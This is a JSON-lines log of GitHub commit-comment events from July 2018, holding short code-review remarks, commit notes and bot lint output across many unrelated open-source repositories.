{"id":"8004960201","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29802604,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T16:16:16Z","updated_at":"2018-07-23T16:16:16Z","author_association":"NONE","body":"But wouldn't it stand to reason that if an error occurred while attempting to parse the config, and the policy is that if the config is malformed in some way, or otherwise fails to parse for whatever reason, to explicitly not continue ([as you suggest here](https://github.com/Maxopoly/MoreEnchantables/commit/93cf861458bf8500f03ac6658d0a53a82e378b8f#r29756869))... then catching any error to not continue is okay?\r\n\r\nAt this point, I might as well just remove the try/catch."}},"created_at":"2018-07-23T16:16:16Z"}
{"id":"8004960817","type":"CommitCommentEvent","actor":{"login":"jstarks"},"repo":{"name":"jterry75/moby"},"payload":{"comment":{"id":29802605,"position":null,"line":null,"path":null,"commit_id":"b02fa725a9bfc92311a09d01502461120ee329ee","created_at":"2018-07-23T16:16:22Z","updated_at":"2018-07-23T16:16:22Z","author_association":"NONE","body":"Yes, this looks right."}},"created_at":"2018-07-23T16:16:22Z"}
{"id":"8004971959","type":"CommitCommentEvent","actor":{"login":"sirbrillig"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29802618,"position":11,"line":23,"path":"composer.json","commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T16:18:25Z","updated_at":"2018-07-23T16:18:25Z","author_association":"MEMBER","body":"🤔 I guess this might be a bit too wide a range. \r\n\r\nI was following the composer guide, which suggests this format of php version requirement, and I was also thinking that maybe we would want this to be able to be used in future versions of php without needing to update the required version. However, I suppose that a major version bump would imply backwards breaking changes, which could break this code. Reverted in #68 "}},"created_at":"2018-07-23T16:18:25Z"}
{"id":"8004974409","type":"CommitCommentEvent","actor":{"login":"ctwoo"},"repo":{"name":"ctwoo/abs_humidity"},"payload":{"comment":{"id":29802623,"position":null,"line":null,"path":null,"commit_id":"7605334549a3afd3a5602a8fd726bffe803f2559","created_at":"2018-07-23T16:18:53Z","updated_at":"2018-07-23T16:18:53Z","author_association":"OWNER","body":"Accidentally added the whole abs_humidity file I think, while the edits were strictly in calc.cpp. Sorry about that"}},"created_at":"2018-07-23T16:18:53Z"}
{"id":"8004976562","type":"CommitCommentEvent","actor":{"login":"Panchajanya1999"},"repo":{"name":"Haseo97/kernel_rebirth_xiaomi_sdm660"},"payload":{"comment":{"id":29802627,"position":null,"line":null,"path":null,"commit_id":"8ab50e9ac880f068985cd4c28cf28885b9cb4ea7","created_at":"2018-07-23T16:19:17Z","updated_at":"2018-07-23T16:19:17Z","author_association":"CONTRIBUTOR","body":"it does what?\r\n"}},"created_at":"2018-07-23T16:19:17Z"}
{"id":"8004977577","type":"CommitCommentEvent","actor":{"login":"bernars-usa"},"repo":{"name":"usds/us-forms-system"},"payload":{"comment":{"id":29802630,"position":6,"line":13,"path":"docs/building-a-form/available-widgets.md","commit_id":"bb892ab32d3c1e52941ecdf592543dd8665772bb","created_at":"2018-07-23T16:19:29Z","updated_at":"2018-07-23T16:19:29Z","author_association":"CONTRIBUTOR","body":"I'll take a look at it. Thanks for the extra context."}},"created_at":"2018-07-23T16:19:29Z"}
{"id":"8004978761","type":"CommitCommentEvent","actor":{"login":"raz123"},"repo":{"name":"imperdin/xmr-stak"},"payload":{"comment":{"id":29802633,"position":null,"line":null,"path":null,"commit_id":"5b43d37d21a6c79e4945b72af1c0fea6a188cad2","created_at":"2018-07-23T16:19:42Z","updated_at":"2018-07-23T16:19:42Z","author_association":"NONE","body":"Nice work. His this optimization been quantified?"}},"created_at":"2018-07-23T16:19:42Z"}
{"id":"8004979997","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29802639,"position":null,"line":null,"path":null,"commit_id":"d1cd17ee1d094334dccdff484b830a5a604bbe37","created_at":"2018-07-23T16:19:57Z","updated_at":"2018-07-23T16:19:57Z","author_association":"NONE","body":"It is curious that it failed, although long SPRT[-3, 1] are not always replicable.\r\n\r\nOne would have expected that the lower Overload bonus would have make it easier to remove the nonPawnEnemies restriction\r\n\r\nMaybe you should keep your original Overload values ?\r\n\r\n\r\n"}},"created_at":"2018-07-23T16:19:57Z"}
{"id":"8004981442","type":"CommitCommentEvent","actor":{"login":"tobinw"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29802647,"position":196,"line":196,"path":"apf/apfAggregateNumbering.cc","commit_id":"f2137ffaf29bcdb0954a271b8310061dc816251e","created_at":"2018-07-23T16:20:14Z","updated_at":"2018-07-23T16:20:14Z","author_association":"CONTRIBUTOR","body":"This can be replaced with direct PCU usage to create an equivalent operator."}},"created_at":"2018-07-23T16:20:14Z"}
{"id":"8004982693","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29802652,"position":140,"line":93,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T16:20:28Z","updated_at":"2018-07-23T16:20:28Z","author_association":"COLLABORATOR","body":"А почему Automatic Dimension не для этого?"}},"created_at":"2018-07-23T16:20:28Z"}
{"id":"8004982910","type":"CommitCommentEvent","actor":{"login":"tobinw"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29802653,"position":265,"line":265,"path":"apf/apfAggregateNumbering.cc","commit_id":"f2137ffaf29bcdb0954a271b8310061dc816251e","created_at":"2018-07-23T16:20:30Z","updated_at":"2018-07-23T16:20:30Z","author_association":"CONTRIBUTOR","body":"This can be replaced with direct PCU usage to create an equivalent operator."}},"created_at":"2018-07-23T16:20:30Z"}
{"id":"8004983322","type":"CommitCommentEvent","actor":{"login":"tobinw"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29802654,"position":273,"line":273,"path":"apf/apfAggregateNumbering.cc","commit_id":"f2137ffaf29bcdb0954a271b8310061dc816251e","created_at":"2018-07-23T16:20:35Z","updated_at":"2018-07-23T16:20:35Z","author_association":"CONTRIBUTOR","body":"This can be replaced with direct PCU usage to create an equivalent operator."}},"created_at":"2018-07-23T16:20:35Z"}
{"id":"8004985423","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29802658,"position":72,"line":118,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-23T16:20:59Z","updated_at":"2018-07-23T16:20:59Z","author_association":"NONE","body":"Using the Ractive event system you should be able to pass the necessary information along with the event itself.  That way you don't have to look-up which item was selected or clicked, because the item that was selected/clicked will \"tell\" the receiver of the event what it needs to know.  "}},"created_at":"2018-07-23T16:20:59Z"}
{"id":"8004992065","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29802671,"position":23,"line":183,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Ide.StatusService/StatusMessageContext.cs","commit_id":"62bd02abd135efc3e332dedb97a56099fe6cd0ab","created_at":"2018-07-23T16:22:16Z","updated_at":"2018-07-23T16:22:16Z","author_association":"MEMBER","body":"I'm not sold on the naming here."}},"created_at":"2018-07-23T16:22:16Z"}
{"id":"8004992371","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29802672,"position":80,"line":588,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"e7252a0697a584f1c8795371b636a21d2afc15d9","created_at":"2018-07-23T16:22:19Z","updated_at":"2018-07-23T16:22:19Z","author_association":"COLLABORATOR","body":"You have to explicitly cast everything?  I thought that was only a problem with non-standard data types, like ci8, that lacked a complete set of casting rules."}},"created_at":"2018-07-23T16:22:19Z"}
{"id":"8004995698","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29802675,"position":31,"line":77,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-23T16:22:55Z","updated_at":"2018-07-23T16:22:55Z","author_association":"NONE","body":"I meant to avoid the check in the `getCodeUsage()` method - you'd call it in `setCodeUsage()` instead, again just to avoid trying to use `null` to mean something."}},"created_at":"2018-07-23T16:22:55Z"}
{"id":"8005037135","type":"CommitCommentEvent","actor":{"login":"RMerl"},"repo":{"name":"RMerl/asuswrt-merlin.ng"},"payload":{"comment":{"id":29802737,"position":null,"line":null,"path":null,"commit_id":"d307e547b95b627c6cc2610819c2a7a47519fa76","created_at":"2018-07-23T16:30:37Z","updated_at":"2018-07-23T16:30:37Z","author_association":"OWNER","body":"For consistency.  The validator object is used throughout the rest of the firmware, with its own warning messages where applicable."}},"created_at":"2018-07-23T16:30:37Z"}
{"id":"8005041546","type":"CommitCommentEvent","actor":{"login":"CheshireSwift"},"repo":{"name":"AIOOB/BusBoard"},"payload":{"comment":{"id":29802743,"position":11,"line":11,"path":"frontend/departures.js","commit_id":"a60cddb456f3ad98b1708c27b81b25eda555beb8","created_at":"2018-07-23T16:31:26Z","updated_at":"2018-07-23T16:31:26Z","author_association":"NONE","body":"Your arrow functions are immediately returning single expressions, so it's better to use the non-block syntax:\r\n\r\n    stops.map(stop =>\r\n      `<h3>${stop.stopName}</h3> <ul>${stop.nextBuses.map(bus =>\r\n        ...\r\n      ).join()}</ul>`j\r\n    )"}},"created_at":"2018-07-23T16:31:26Z"}
{"id":"8005048179","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29802752,"position":44,"line":44,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T16:32:40Z","updated_at":"2018-07-23T16:32:40Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-23T16:32:40Z"}
{"id":"8005050542","type":"CommitCommentEvent","actor":{"login":"Toxu-ru"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29802756,"position":null,"line":null,"path":null,"commit_id":"eda1462b3b8f57aace0c49b1d64edfcf3d1f45b2","created_at":"2018-07-23T16:33:06Z","updated_at":"2018-07-23T16:33:06Z","author_association":"CONTRIBUTOR","body":"Good change. \r\n\r\nIs the translation not working correctly?\r\n\r\n![Alt](https://toxu.ru/uploads/default/original/2X/0/06df99c588a091982dd175fb4eaaffe202fbec73.jpg)"}},"created_at":"2018-07-23T16:33:06Z"}
{"id":"8005051216","type":"CommitCommentEvent","actor":{"login":"sapegin"},"repo":{"name":"jamiew/git-friendly"},"payload":{"comment":{"id":29802757,"position":null,"line":null,"path":null,"commit_id":"7b81d239bf5657fb9909cb2755bdd95c58b67b3f","created_at":"2018-07-23T16:33:13Z","updated_at":"2018-07-23T16:33:13Z","author_association":"COLLABORATOR","body":"There are in the comment in the beginning of the section ;-)"}},"created_at":"2018-07-23T16:33:13Z"}
{"id":"8005059072","type":"CommitCommentEvent","actor":{"login":"Gabriel1786"},"repo":{"name":"Gabriel1786/Homepwner"},"payload":{"comment":{"id":29802775,"position":5,"line":22,"path":"Homepwner/ImageStore.swift","commit_id":"844228e7cf55fcd3a18dad49dd723d61a469950a","created_at":"2018-07-23T16:34:46Z","updated_at":"2018-07-23T16:34:46Z","author_association":"OWNER","body":"Blz vlw"}},"created_at":"2018-07-23T16:34:46Z"}
{"id":"8005061288","type":"CommitCommentEvent","actor":{"login":"erindubuc"},"repo":{"name":"erindubuc/pvd-page"},"payload":{"comment":{"id":29802780,"position":null,"line":null,"path":null,"commit_id":"9968e035c5146104fa061b62a2a7022dd0537d48","created_at":"2018-07-23T16:35:11Z","updated_at":"2018-07-23T16:35:11Z","author_association":"OWNER","body":"Thanks for the ideas!"}},"created_at":"2018-07-23T16:35:11Z"}
{"id":"8005061635","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29802781,"position":null,"line":null,"path":null,"commit_id":"d1cd17ee1d094334dccdff484b830a5a604bbe37","created_at":"2018-07-23T16:35:15Z","updated_at":"2018-07-23T16:35:15Z","author_association":"OWNER","body":"It is snicolet's request: https://github.com/official-stockfish/Stockfish/pull/1693"}},"created_at":"2018-07-23T16:35:15Z"}
{"id":"8005062391","type":"CommitCommentEvent","actor":{"login":"sirbrillig"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29802783,"position":11,"line":23,"path":"composer.json","commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T16:35:24Z","updated_at":"2018-07-23T16:35:24Z","author_association":"MEMBER","body":"This was where I was looking: https://getcomposer.org/doc/01-basic-usage.md#platform-packages\r\n\r\n> Btw, I see there are lot of duplicated sniffs that are already in PHP CS Fixer.\r\n\r\nFrom what I understand, phpcs and php-cs-fixer are not compatible, so this provides sniffs for the phpcs engine. Our code base is already using phpcs and adding php-cs-fixer would be a much bigger change than adding new sniffs for the existing engine."}},"created_at":"2018-07-23T16:35:24Z"}
{"id":"8005063324","type":"CommitCommentEvent","actor":{"login":"oksana2019"},"repo":{"name":"oksana2018/Rainbow-Poem"},"payload":{"comment":{"id":29802785,"position":null,"line":null,"path":null,"commit_id":"155bc35bf0ae6d53d05f54e3247b0495437ae568","created_at":"2018-07-23T16:35:34Z","updated_at":"2018-07-23T16:35:34Z","author_association":"NONE","body":"Please add the duplicate"}},"created_at":"2018-07-23T16:35:34Z"}
{"id":"8005063432","type":"CommitCommentEvent","actor":{"login":"beluga3858"},"repo":{"name":"beluga3858/bluepy"},"payload":{"comment":{"id":29802786,"position":null,"line":null,"path":null,"commit_id":"1f6396745e338ad6c8f7d4f0495d150180f814fb","created_at":"2018-07-23T16:35:35Z","updated_at":"2018-07-23T16:35:35Z","author_association":"OWNER","body":"For issue #285"}},"created_at":"2018-07-23T16:35:35Z"}
{"id":"8005065335","type":"CommitCommentEvent","actor":{"login":"darcywong00"},"repo":{"name":"keymanapp/keyman"},"payload":{"comment":{"id":29802791,"position":4,"line":4,"path":"mac/history.md","commit_id":"feefc7993f9b51b0c21bda08f0cd055dbc528e46","created_at":"2018-07-23T16:35:57Z","updated_at":"2018-07-23T16:35:57Z","author_association":"CONTRIBUTOR","body":"For release notes, it might help to be more specific like\r\n> Removed help button from OSK for macOS versions prior to 10.10..."}},"created_at":"2018-07-23T16:35:57Z"}
{"id":"8005071847","type":"CommitCommentEvent","actor":{"login":"lak-proddev"},"repo":{"name":"spring-projects/eclipse-integration-tcserver"},"payload":{"comment":{"id":29802798,"position":null,"line":null,"path":null,"commit_id":"bcefb0517f2bcf0283dbd1479d1cba1e729df457","created_at":"2018-07-23T16:37:11Z","updated_at":"2018-07-23T16:37:11Z","author_association":"CONTRIBUTOR","body":"thank you very much"}},"created_at":"2018-07-23T16:37:11Z"}
{"id":"8005072305","type":"CommitCommentEvent","actor":{"login":"CheshireSwift"},"repo":{"name":"AIOOB/BusBoard"},"payload":{"comment":{"id":29802802,"position":27,"line":17,"path":"frontend/departures.js","commit_id":"47201fd978e9f02d54255d6e5c151ef1a52c504e","created_at":"2018-07-23T16:37:16Z","updated_at":"2018-07-23T16:37:16Z","author_association":"NONE","body":"This would be nicer as an early return:\r\n\r\n    if (xhttp.status !== 200) {\r\n      // innerHTML = responseText\r\n      return;\r\n    }\r\n\r\n    // do stuff with valid response"}},"created_at":"2018-07-23T16:37:16Z"}
{"id":"8005073326","type":"CommitCommentEvent","actor":{"login":"enekitortega"},"repo":{"name":"enekitortega/PS_LG"},"payload":{"comment":{"id":29802803,"position":null,"line":null,"path":null,"commit_id":"680c7dfa8f53784009b83f29e67c5cefd3254c67","created_at":"2018-07-23T16:37:27Z","updated_at":"2018-07-23T16:37:27Z","author_association":"OWNER","body":"0_PS_LG: commit inicial"}},"created_at":"2018-07-23T16:37:27Z"}
{"id":"8005079350","type":"CommitCommentEvent","actor":{"login":"4PERTURE"},"repo":{"name":"Meticulus/android_device_huawei_hi6250"},"payload":{"comment":{"id":29802811,"position":null,"line":null,"path":null,"commit_id":"b2b2a08e89882315343cfa168e1cf50bd2f3f2c8","created_at":"2018-07-23T16:38:35Z","updated_at":"2018-07-23T16:38:35Z","author_association":"NONE","body":"Hello meticulus. Sorry to be bothering you here. But are you going to upload sources for Oreo? The p8 is quite bad in terms of development for Oreo and I was thinking that maaaaaybe a few bugs could be fixed by porting from the p9"}},"created_at":"2018-07-23T16:38:35Z"}
{"id":"8005079988","type":"CommitCommentEvent","actor":{"login":"Blackglade"},"repo":{"name":"Blackglade/RatedAwesome"},"payload":{"comment":{"id":29802814,"position":null,"line":null,"path":null,"commit_id":"7c79a2d30ef1306d18fc63a760b465a07cccdcd3","created_at":"2018-07-23T16:38:43Z","updated_at":"2018-07-23T16:38:43Z","author_association":"OWNER","body":"I gave the credits for the plugins I used at the top :/. And it's not like I'm claiming this work as my own. I just uploaded it here on Github to keep track of my internal version changes."}},"created_at":"2018-07-23T16:38:43Z"}
{"id":"8005082017","type":"CommitCommentEvent","actor":{"login":"Huguet57"},"repo":{"name":"Huguet57/graf"},"payload":{"comment":{"id":29802820,"position":null,"line":null,"path":null,"commit_id":"2c909b3c370a6bce2613940d69aa0ff30a4a4a4e","created_at":"2018-07-23T16:39:06Z","updated_at":"2018-07-23T16:39:06Z","author_association":"OWNER","body":"S'ha afegit el botó d'afegir arestes al dialog box."}},"created_at":"2018-07-23T16:39:06Z"}
{"id":"8005082926","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29802824,"position":null,"line":null,"path":null,"commit_id":"e97a6a6c11ea8558a80165fc1c40715c8af031dc","created_at":"2018-07-23T16:39:15Z","updated_at":"2018-07-23T16:39:15Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-256](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-256-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T16:39:15Z"}
{"id":"8005083804","type":"CommitCommentEvent","actor":{"login":"CheshireSwift"},"repo":{"name":"AIOOB/BusBoard"},"payload":{"comment":{"id":29802826,"position":42,"line":38,"path":"processors.js","commit_id":"47201fd978e9f02d54255d6e5c151ef1a52c504e","created_at":"2018-07-23T16:39:24Z","updated_at":"2018-07-23T16:39:24Z","author_association":"NONE","body":"`if (!tflResult.stopPoints.length)`"}},"created_at":"2018-07-23T16:39:24Z"}
{"id":"8005085713","type":"CommitCommentEvent","actor":{"login":"jcamilosarmientor"},"repo":{"name":"udistrital/financiera_mongo_crud"},"payload":{"comment":{"id":29802828,"position":null,"line":null,"path":null,"commit_id":"91da09780f92f58d71bd4dd0e2d7f0898880eda5","created_at":"2018-07-23T16:39:46Z","updated_at":"2018-07-23T16:39:46Z","author_association":"COLLABORATOR","body":"con ayuda de @miguelramirez93 "}},"created_at":"2018-07-23T16:39:46Z"}
{"id":"8005086734","type":"CommitCommentEvent","actor":{"login":"Huguet57"},"repo":{"name":"Huguet57/graf"},"payload":{"comment":{"id":29802830,"position":null,"line":null,"path":null,"commit_id":"25cb685f1780ac8507d74a104d1569a2e13b476f","created_at":"2018-07-23T16:39:57Z","updated_at":"2018-07-23T16:39:57Z","author_association":"OWNER","body":"S'ha creat un nou fitxer CSS per organitzar-ho millor i s'ha afegit el botó d'afegir arestes i el missatge d'aresta afegida."}},"created_at":"2018-07-23T16:39:57Z"}
{"id":"8005089847","type":"CommitCommentEvent","actor":{"login":"tripathi007"},"repo":{"name":"tripathi007/My-box"},"payload":{"comment":{"id":29802839,"position":null,"line":null,"path":null,"commit_id":"68c7e3198691603876fea796c463db4a94ec57bb","created_at":"2018-07-23T16:40:30Z","updated_at":"2018-07-23T16:40:30Z","author_association":"OWNER","body":"the my box is decentralised type of cloud storage network. "}},"created_at":"2018-07-23T16:40:30Z"}
{"id":"8005090163","type":"CommitCommentEvent","actor":{"login":"JoshuaTheEpic"},"repo":{"name":"JoshuaTheEpic/capstone_game"},"payload":{"comment":{"id":29802841,"position":null,"line":null,"path":null,"commit_id":"2e2722aacb085ed505ae609a7b969d1da942ed0c","created_at":"2018-07-23T16:40:33Z","updated_at":"2018-07-23T16:40:33Z","author_association":"OWNER","body":"initialized git hub and inserted redux bootstrap"}},"created_at":"2018-07-23T16:40:33Z"}
{"id":"8005091992","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"Azure/doAzureParallel"},"payload":{"comment":{"id":29802846,"position":null,"line":null,"path":null,"commit_id":"8a882554266c2468ef23da1c06207ded6a3fc0ba","created_at":"2018-07-23T16:40:54Z","updated_at":"2018-07-23T16:40:54Z","author_association":"NONE","body":"[R/batch-api.R:48:25:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/batch-api.R#L48) *style:* **Use <-, not =, for assignment.**\n```r\n​      containerSettings = list(\n                        ^\n```\n[R/batch-api.R:66:12:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/batch-api.R#L66) *style:* **Commented code should be removed.**\n```r\n​        #  dockerRunCommand(\"alfpark/blobxfer:0.12.1\", copyCommand, \"blobxfer\", FALSE)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:127:28:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/cluster.R#L127) *style:* **Use <-, not =, for assignment.**\n```r\n​    containerConfiguration = list(\n                           ^\n```\n[R/cluster.R:168:8:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/cluster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #loginCommand <- dockerLoginCommand(username, password, registry)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:170:50:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/cluster.R#L170) *style:* **Use <-, not =, for assignment.**\n```r\n​      containerConfiguration$containerRegistries = list(\n                                                 ^\n```\n[R/cluster.R:176:8:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/cluster.R#L176) *style:* **Commented code should be removed.**\n```r\n​      #commandLine <- c(commandLine, loginCommand)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:180:7:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/cluster.R#L180) *style:* **Commented code should be removed.**\n```r\n​    # pullImageCommand <- dockerPullCommand(dockerImage)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:181:6:](https://github.com/Azure/doAzureParallel/blob/8a882554266c2468ef23da1c06207ded6a3fc0ba/R/cluster.R#L181) *style:* **Commented code should be removed.**\n```r\n​    #commandLine <- c(commandLine, pullImageCommand)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-23T16:40:54Z"}
{"id":"8005092919","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29802848,"position":null,"line":null,"path":null,"commit_id":"040f06235fb6c1ea95416f42edaccc3322f94202","created_at":"2018-07-23T16:41:06Z","updated_at":"2018-07-23T16:41:06Z","author_association":"CONTRIBUTOR","body":"Updated talent. Added recipes."}},"created_at":"2018-07-23T16:41:06Z"}
{"id":"8005093005","type":"CommitCommentEvent","actor":{"login":"Huguet57"},"repo":{"name":"Huguet57/graf"},"payload":{"comment":{"id":29802849,"position":null,"line":null,"path":null,"commit_id":"ac6d0c560e04e10e2a06302d1887725a45a369c7","created_at":"2018-07-23T16:41:07Z","updated_at":"2018-07-23T16:41:07Z","author_association":"OWNER","body":"S'ha afegit la funció d'afegir arestes."}},"created_at":"2018-07-23T16:41:07Z"}
{"id":"8005094106","type":"CommitCommentEvent","actor":{"login":"rocsilva"},"repo":{"name":"rocsilva/eejvm-app"},"payload":{"comment":{"id":29802850,"position":null,"line":null,"path":null,"commit_id":"51b7566616f1240b46d16d1725595d107beafbf7","created_at":"2018-07-23T16:41:19Z","updated_at":"2018-07-23T16:41:19Z","author_association":"OWNER","body":"*Ajuste no projeto para resolver o erro de vulnerabilidade apontada pelo github."}},"created_at":"2018-07-23T16:41:19Z"}
{"id":"8005095766","type":"CommitCommentEvent","actor":{"login":"acantosh"},"repo":{"name":"zszfrz/mapcamp"},"payload":{"comment":{"id":29802853,"position":14,"line":86,"path":"src/main/java/com/mapcamp/domain/entity/User.java","commit_id":"54545d079345d022d94f85a40bf8a66affe0afe8","created_at":"2018-07-23T16:41:37Z","updated_at":"2018-07-23T16:41:37Z","author_association":"COLLABORATOR","body":"これでいいのか"}},"created_at":"2018-07-23T16:41:37Z"}
{"id":"8005096067","type":"CommitCommentEvent","actor":{"login":"CheshireSwift"},"repo":{"name":"AIOOB/BusBoard"},"payload":{"comment":{"id":29802855,"position":5,"line":20,"path":"frontend/index.html","commit_id":"a2bff138b1d4a2ad99e46301328a15172400be32","created_at":"2018-07-23T16:41:41Z","updated_at":"2018-07-23T16:41:41Z","author_association":"NONE","body":"`updateBuses(document.getElementById('postcode').value)`, perhaps?"}},"created_at":"2018-07-23T16:41:41Z"}
{"id":"8005098157","type":"CommitCommentEvent","actor":{"login":"pihu9"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802859,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T16:42:07Z","updated_at":"2018-07-23T16:42:07Z","author_association":"NONE","body":"I like this project,because this project is great and team work good.\r\ngood luck team."}},"created_at":"2018-07-23T16:42:07Z"}
{"id":"8005101965","type":"CommitCommentEvent","actor":{"login":"DARGA85"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802872,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T16:42:51Z","updated_at":"2018-07-23T16:42:51Z","author_association":"NONE","body":"good project"}},"created_at":"2018-07-23T16:42:51Z"}
{"id":"8005103389","type":"CommitCommentEvent","actor":{"login":"DARGA85"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802875,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T16:43:07Z","updated_at":"2018-07-23T16:43:07Z","author_association":"NONE","body":"good project"}},"created_at":"2018-07-23T16:43:07Z"}
{"id":"8005103520","type":"CommitCommentEvent","actor":{"login":"rocsilva"},"repo":{"name":"rocsilva/eejvm-app"},"payload":{"comment":{"id":29802876,"position":null,"line":null,"path":null,"commit_id":"f132b12ea719c7d7b1d499c4d4fcef5f6d2e4b8d","created_at":"2018-07-23T16:43:08Z","updated_at":"2018-07-23T16:43:08Z","author_association":"OWNER","body":"Para solucionar o erro de \"arquivo app.component.scss não encontrado\" ao executar o comando ng serve, foi adicionado o arquivo .scss ao app component."}},"created_at":"2018-07-23T16:43:08Z"}
{"id":"8005104317","type":"CommitCommentEvent","actor":{"login":"acantosh"},"repo":{"name":"zszfrz/mapcamp"},"payload":{"comment":{"id":29802878,"position":21,"line":29,"path":"src/main/java/com/mapcamp/web/controller/CommentController.java","commit_id":"54545d079345d022d94f85a40bf8a66affe0afe8","created_at":"2018-07-23T16:43:17Z","updated_at":"2018-07-23T16:43:17Z","author_association":"COLLABORATOR","body":"いるんじゃなかったっけ"}},"created_at":"2018-07-23T16:43:17Z"}
{"id":"8005106407","type":"CommitCommentEvent","actor":{"login":"braver"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29802884,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-23T16:43:41Z","updated_at":"2018-07-23T16:43:41Z","author_association":"MEMBER","body":"Because people will have set it via the settings to something other than PSR2? I doubt that covers all cases and changing the default away from PSR2 will break at least as many setups anyway. I *really* want to move plugins away from using settings and we'll have to break to get there. I hope it's not too bad, and I did add a message about it."}},"created_at":"2018-07-23T16:43:41Z"}
